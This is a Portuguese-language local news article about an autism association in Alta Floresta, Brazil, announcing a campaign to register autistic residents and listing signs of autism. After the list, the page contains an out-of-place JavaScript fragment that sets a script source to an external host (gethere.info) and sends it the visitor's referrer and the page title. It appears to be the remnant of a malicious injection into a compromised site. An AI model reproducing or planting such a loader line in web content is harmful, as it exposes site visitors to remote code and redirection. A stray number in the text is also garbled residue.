Capa / Educação / AMA, lança a campanha de CADASTRO DOS AUTISTAS de Alta Floresta

AMA, lança a campanha de CADASTRO DOS AUTISTAS de Alta Floresta

Fonte: Nativa News / Kariny Santos

Associação Amigos do Autista (AMA), lança a campanha de CADASTRO DOS AUTISTAS de Alta Floresta, com objetivo de obtenção de dados estatísticos do numero de autistas no município, o cadastramento acontecerá no dia 16/07 (sábado) das 14h00 às 17h00, no hall do centro cultural e de eventos (praça do avião). “A principio a gente quer identificar estes autistas para ter dados estatísticos de quantos eles são, onde eles estão, se eles estão tendo tratamento adequado, se eles estão tendo acesso às políticas publicas adequadas a eles aqui no nosso município”, destacou Lila Burli da Costa assistente social e presidente da AMA.

Segundo a assistente a diretoria da AMA-AF conta com 23 membros, que foram escolhidos em assembléia geral no dia 30/10/2015 na câmara municipal de vereadores. Os cargos de presidente, vice-presidente, 1ª e 2ª secretaria, são compostos por mães de autistas, seguindo uma tradição da abra (associação brasileira de autismo).  O grupo decidiu criar a campanha, pois acredita que o município possua mais autistas do que o quantitativo registrado,  já que muitos ou por serem adultos, ou por serem crianças muito novas não estão inserido na unidade Escolar, ficando de fora desta estatística da Secretária municipal de Educação. “Nós ainda não temos esta comprovação estatística, pelos dados da secretaria de educação nós temos em média de 100 autistas no município, mas nós acreditamos que possam existir mais, porque existem autistas que nós estamos encontrando e que estão buscando conhecer mais sobre a AMA e eles não estão inseridos na escola”, pontuou.

382024A AMA não possui sede própria, para as reuniões o grupo utiliza as dependências da secretária municipal de educação, localizada na esquina da A2, segundo Lila algumas pessoas ainda confunde a “as atividades da AMA não tem nada haver com as atividades da APAE, as vezes se confundem por eu ser assistente social, estou atuando na APAE mas ao mesmo tempo sou presidente da AMA e são instituições distintas e a gente não pode misturar uma coisa com a outra”, explicou.

O autismo é uma síndrome que atinge quase dois milhões de brasileiros, alguns sinais do autismo são:

  • Brinca ou usa brinquedos de forma incomum
  • Dificuldade de se relacionar com pares da mesma idade
  • Choro ou risadas inapropriadas
  • Hiperatividade ou muita passividade
  • Sensibilidade a alguns sons
  • Fala com dificuldade ou ausência de fala
  • Apego a objetos diferentes
  • Dificuldade em lidar com alteração de rotina
  • Falta de consciência de perigo
  • Inabilidade para interagir socialmente;
  • Dificuldade no domínio da linguagem para comunicar-se ou lidar com jogos simbólicos;
  • Padrão de comportamento restritivo e repetitivo

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top